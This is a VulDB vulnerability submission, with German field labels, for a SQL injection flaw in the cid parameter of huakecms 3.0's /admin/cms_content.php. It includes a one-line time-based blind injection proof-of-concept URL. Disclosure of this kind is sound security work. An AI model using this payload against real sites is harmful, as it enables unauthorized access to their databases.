| Titel | huakecms free version3.0 was discovered to contain SQL injection vulnerability |
|---|
| Beschreibung | 华科网站管理系统免费版3.0(huakecms free version 3.0) is a set of intelligent website building software based on PHP! The product has the characteristics of novel and beautiful interface, dynamic and fashionable, etc. It is a CMS content management system serving small and medium-sized enterprises. The threshold for using the software is low, no professional computer knowledge is required, full back-end operation management, simple operation and powerful functions, and the software also has extremely Strong scalability, can adapt to different needs of various industries.
[Suggested description]
huakecms free version 3.0 was discovered to contain SQL injection vulnerability in /admin/cms_content.php
[Vulnerability Type]
SQL INJECTION
[Vendor of Product]
http://www.huakecms.com/
[Affected Product Code Base]
huakecms free version Dev 3.0
[Affected Component]
File: /admin/cms_content.php
Parameter: cid
[Attack Type]
Remote
[poc]
http://localhost:8086/admin/cms_content.php?key=t&type=&search=%E7%BB%BC%E5%90%88%E6%9D%A1%E4%BB%B6%E6%9F%A5%E8%AF%A2&cid=1 AND (SELECT 3158 FROM (SELECT(SLEEP(5)))YkeQ) |
|---|
| Quelle | ⚠️ https://github.com/yhy217/huakecms-vul/issues/1 |
|---|
| Benutzer | jamspilly (UID 54414) |
|---|
| Einreichung | 19.09.2023 07:00 (vor 3 Jahren) |
|---|
| Moderieren | 29.09.2023 07:38 (10 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 240877 [huakecms 3.0 /admin/cms_content.php cid SQL Injection] |
|---|
| Punkte | 20 |
|---|